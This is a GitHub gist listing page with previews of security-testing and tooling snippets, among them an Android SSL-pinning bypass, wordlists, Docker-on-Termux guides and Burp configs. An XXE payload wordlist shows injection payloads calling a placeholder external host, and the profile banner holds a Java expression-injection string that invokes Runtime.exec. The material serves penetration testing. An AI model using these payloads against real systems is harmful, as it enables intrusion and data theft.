Skip to content

Instantly share code, notes, and snippets.

View schniggie's full-sized avatar
💣
/${@𝚓𝚊𝚟𝚊.𝚕𝚊𝚗𝚐.𝚁𝚞𝚗𝚝𝚒𝚖𝚎@𝚐𝚎𝚝𝚁𝚞𝚗𝚝𝚒𝚖𝚎().𝚎𝚡𝚎𝚌("𝚆𝚃𝙵 𝙰𝚝𝚕𝚊𝚜𝚜𝚒𝚊𝚗")}/

ᄃΉЯIƧƬӨPΉΣЯ (BᄂΣᄃKMΛПП-)DЯΣΉΣЯ schniggie

💣
/${@𝚓𝚊𝚟𝚊.𝚕𝚊𝚗𝚐.𝚁𝚞𝚗𝚝𝚒𝚖𝚎@𝚐𝚎𝚝𝚁𝚞𝚗𝚝𝚒𝚖𝚎().𝚎𝚡𝚎𝚌("𝚆𝚃𝙵 𝙰𝚝𝚕𝚊𝚜𝚜𝚒𝚊𝚗")}/
28 followers · 6 following
View GitHub Profile
@incogbyte
incogbyte / mixunpin.js
Last active May 2, 2024 07:03
Frida script to bypass common methods of sslpining Android
console.log("[*] SSL Pinning Bypasses");
console.log(`[*] Your frida version: ${Frida.version}`);
console.log(`[*] Your script runtime: ${Script.runtime}`);
/**
* by incogbyte
* Common functions
* thx apkunpacker, NVISOsecurity, TheDauntless
* Remember that sslpinning can be custom, and sometimes u need to reversing using ghidra,IDA or something like that.
* !!! THIS SCRIPT IS NOT A SILVER BULLET !!
@lanmaster53
lanmaster53 / whey-cewler.py
Last active January 9, 2024 18:49
'''
Based on the initial work of Digininja at https://github.com/digininja/CeWL. While CeWL is a script written
in Ruby that requires an independent crawl of a website in order to build a custom wordlist, Whey CeWLer
runs within Portswigger's Burp Suite and parses an already crawled sitemap to build a custom wordlist. It
does not have the meta data parsing capabilities that CeWL does, but it more than makes up for it in
convenience.
The name gets its origins from the CeWLer portion of the CO2 Burp extension by Jason Gillam, which is written
in Java and does something similar, but Whey CeWLer is a completely reimagined extension written in Python,
making it "way cooler".
@FreddieOliveira
FreddieOliveira / docker.md
Last active July 27, 2024 16:12
This tutorial shows how to run docker natively on Android, without VMs and chroot.

Docker on Android 🐋📱

Edit 🎉

All packages, except for Tini have been added to termux-root. To install them, simply pkg install root-repo && pkg install docker. This will install the whole docker suite, left only Tini to be compiled manually.

Summary

@coaxial
coaxial / README.md
Last active May 3, 2024 20:06
unpinning SSL certs on Android apps with Frida to inspect network traffic with mitmproxy

Most of the time, applications won't pin the certificate. Running mitmproxy and passing all Android traffic through it is as simple as adb connect <IP> && adb shell settings put global http_proxy <mitmproxy host>:<mitmproxy port> (or use Android's UI)

Some applications, however, pin the certificate and will refuse to do any network calls if using mitmproxy.

Luckily, Frida is here!

This assumes Android x86 is running in a VM, that you are a developer in Android (tap the build version enough times), adb debugging is enabled, and that android tools are installed on the host.

  • start mitmproxy on host
  • visit mitm.it on the target (after setting the proxy) and install the spoofed cert
@honoki
honoki / xxe-payloads.txt
Last active March 27, 2024 18:49
XXE bruteforce wordlist including local DTD payloads from https://github.com/GoSecure/dtd-finder
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x SYSTEM "http://xxe-doctype-system.yourdomain[.]com/"><x />
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x PUBLIC "" "http://xxe-doctype-public.yourdomain[.]com/"><x />
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe SYSTEM "http://xxe-entity-system.yourdomain[.]com/">]><x>&xxe;</x>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe PUBLIC "" "http://xxe-entity-public.yourdomain[.]com/">]><x>&xxe;</x>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe SYSTEM "http://xxe-paramentity-system.yourdomain[.]com/">%xxe;]><x/>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe PUBLIC "" "http://xxe-paramentity-public.yourdomain[.]com/">%xxe;]><x/>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><x xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://xxe-xsi-schemalocation.y
@oofnikj
oofnikj / answerfile
Last active July 29, 2024 13:55
Install Docker on Termux
KEYMAPOPTS="us us"
HOSTNAMEOPTS="-n alpine"
INTERFACESOPTS="auto lo
iface lo inet loopback
auto eth0
iface eth0 inet dhcp
hostname alpine
"
TIMEZONEOPTS="-z UTC"
@glowinthedark
glowinthedark / generate_directory_index_caddystyle.py
Last active February 16, 2024 21:58
Generate directory index (recurse subfolders with `-r` or `--recursive`). Use `-h` or `--help` for all options ❗️superseded by https://github.com/glowinthedark/index-html-generator
#!/usr/bin/env python3
# NOTE: this script is deprecated;
# maintained version with SVG icons: https://github.com/glowinthedark/index-html-generator/
# ---
# Copyright 2020 glowinthedark
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
@gpoole
gpoole / README.md
Last active April 10, 2024 02:41
Xen/XCP-ng script to attach physical USB devices via passthrough to a VM

XCP-ng USB passthrough tools

A set of command line tools and a service to make setting up passthrough USB devices easier:

  • add-custom-usb-policies - script to store and apply custom USB policies required for specific devices
  • attach-usb-devices - script and service to automatically connect USB devices to VMS when XCP-ng boots up
  • plug-usb - attach a physical USB device to a VM in one command
  • unplug-usb - remove a physical USB device from a VM in one command

To set up, copy the files onto your server and run install.sh to copy everything and set up the service.

@nahamsec
nahamsec / 1stleveldomainsbycount
Created June 25, 2020 19:44
This file has been truncated, but you can view the full file.
www,719407
api,69552
eks,67581
svc,67131
cloudapp,65945
vpn,55659
bastion,53840
ax,40676
dev,38756
operations,35663
@vsec7
vsec7 / BurpSuiteSSLPassTrough.json
Created June 25, 2020 11:43
Filter out the noise
{
"proxy":{
"ssl_pass_through":{
"automatically_add_entries_on_client_ssl_negotiation_failure":false,
"rules":[
{
"enabled":true,
"host":".*\\.google\\.com",
"protocol":"any"
},